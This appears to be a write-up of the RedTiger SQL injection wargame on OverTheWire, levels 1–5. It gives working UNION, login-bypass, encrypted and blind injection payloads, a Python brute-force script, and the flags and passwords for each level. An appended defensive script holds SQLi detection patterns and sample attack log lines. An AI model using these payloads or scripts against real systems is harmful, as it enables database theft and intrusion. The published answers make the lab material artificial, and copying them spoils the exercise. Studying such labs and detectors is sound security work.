Level 1
First, click into Category 1.
The URL ends with ?cat=1, which is obviously a SQL injection.
I noticed it even gives you the table name... Tablename: level1_users
So I built:
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
That returns the password thatwaseasy
The flag is 27cbddc803ecde822d87a7e8639f9315
Level 2
There is a login form, so this should also be SQL injection.
I tried the classic universal username/password ' or ''=' and the injection worked.
The flag is 1222e2d4ad5da677efb188550528bfaa
Level 3
The hint says "Get an error"... I spent ages failing to produce an error; after reading someone else's writeup, I changed the parameter to ?usr[1]=1 and got the error message:
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25
Then I looked at urlcrypt.inc, which contains the code below. So the long strings after cow and admin are encrypted; since both the encrypt and decrypt functions are given, I can simply write the SQL injection, encrypt it and send it over. By the way, the encryption scheme has been updated since... If you want to use this, do the encryption on Linux; on Windows it may produce garbled output.
<?php
// warning! ugly code ahead :)
function encrypt($str)
{
    $cryptedstr = "";
    srand(3284724);
    for ($i = 0; $i < strlen($str); $i++)
    {
        $temp = ord(substr($str, $i, 1)) ^ rand(0, 255);
        while (strlen($temp) < 3)
        {
            $temp = "0" . $temp;
        }
        $cryptedstr .= $temp . "";
    }
    return base64_encode($cryptedstr);
}

function decrypt($str)
{
    srand(3284724);
    if (preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', $str))
    {
        $str = base64_decode($str);
        if ($str != "" && $str != null && $str != false)
        {
            $decStr = "";
            for ($i = 0; $i < strlen($str); $i += 3)
            {
                $array[$i / 3] = substr($str, $i, 3);
            }
            foreach ($array as $s)
            {
                $a = $s ^ rand(0, 255);
                $decStr .= chr($a);
            }
            return $decStr;
        }
        return false;
    }
    return false;
}
?>
The plaintext I constructed is: ' union select 1,password,2,3,4,5,6 from level3_users where username='Admin
After encrypting it I get
https://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw
Got the flag: a707b245a60d570d25a0449c2a516eca
Level 4
Clicked "click me" and noticed ?id=1 was appended, which is clearly injectable; the title on the main page says it is a blind injection...
First, guess how long keyword is:
http://redtiger.labs.overthewire.org/level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21)
It turned out to be 21 characters long, so I wrote a Python script to brute-force it:
from urllib.request import Request, urlopen
import string
from re import findall

char = string.printable
# Boolean condition: true only when the character at position {0} of keyword is {1}
url = "http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,{0},1)='{1}')"
login = {'Cookie': 'level4login=there_is_no_bug'}
answer = ""
for q in range(1, 22):  # keyword is 21 characters long
    for i in char:
        test = url.format(q, i)
        request = Request(test, None, headers=login)
        a = urlopen(request)
        s = a.read().decode()
        # the page says "Query returned 1 rows." when the condition holds
        if findall("Query returned 1 rows.", s):
            print("{0} ".format(q) + i)
            answer += i
            break
print(answer)
That gives keyword killstickswithbr1cks!
flag: e8bcb79c389f5e295bac81fda9fd7cfa
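As an added defensive example (not part of the original writeup): the brute-force loop above leaves a very recognisable trail in the web server's access log, one request per character guess, each carrying a boolean condition on SUBSTR(keyword, pos, 1) or a LENGTH() probe. The script below runs over constructed sample log lines (assumed Apache combined format) and flags clients that issue such probe-shaped requests.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (Apache combined format), modelled on the
# trail the level 4 brute-force loop leaves: one request per character guess.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /level4.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21) HTTP/1.1" 200 530 "-" "Python-urllib/3.8"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,1,1)='a') HTTP/1.1" 200 530 "-" "Python-urllib/3.8"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,1,1)='k') HTTP/1.1" 200 545 "-" "Python-urllib/3.8"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /level4.php?id=1%20and%201=(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,2,1)='i') HTTP/1.1" 200 545 "-" "Python-urllib/3.8"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /level4.php?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Pull client IP, method and request target out of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Decoded query-string shapes typical of boolean-based blind injection:
# a boolean tail wrapping a subquery, a one-character SUBSTR probe, or a
# LENGTH() probe like the length-guessing request in the writeup.
SQLI_RE = re.compile(
    r"\band\s+\d+\s*[=<>]+\s*\(\s*select\b"                  # and 1=(select ...
    r"|\bsubstr(?:ing)?\s*\([^)]*,\s*\d+\s*,\s*1\s*\)\s*="   # substr(col,pos,1)=
    r"|\blength\s*\(\s*\w+\s*\)\s*=",                        # length(col)=
    re.IGNORECASE,
)

def decode_query(target):
    """URL-decode the query string of a request target ('' when there is none)."""
    return unquote(urlsplit(target).query)

def is_blind_sqli(target):
    """True when the decoded query string matches a blind-injection probe."""
    return SQLI_RE.search(decode_query(target)) is not None

def suspicious_clients(log_text, threshold=3):
    """Map client IP -> number of probe-shaped requests, for IPs at or above threshold."""
    hits = Counter()
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_blind_sqli(m.group("target")):
            hits[m.group("ip")] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}
```

In real traffic the threshold would be applied per time window, since a genuine brute-force run produces hundreds of these requests in a few minutes while a single stray match is usually noise.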
Level 5
The description says "watch the login errors".
Then I tried entering admin, and the input box disappeared, so it looks like admin is filtered.
Then I found that it ignores case as well, so let's just bypass it with a hexadecimal literal.
According to the hint the password has to be md5-hashed.
Constructed:
' union select 0x61646d696e as username, md5(123) as password #
The flag is ca5c3c4f0bc85af1392aef35fc1d09b3
To be continued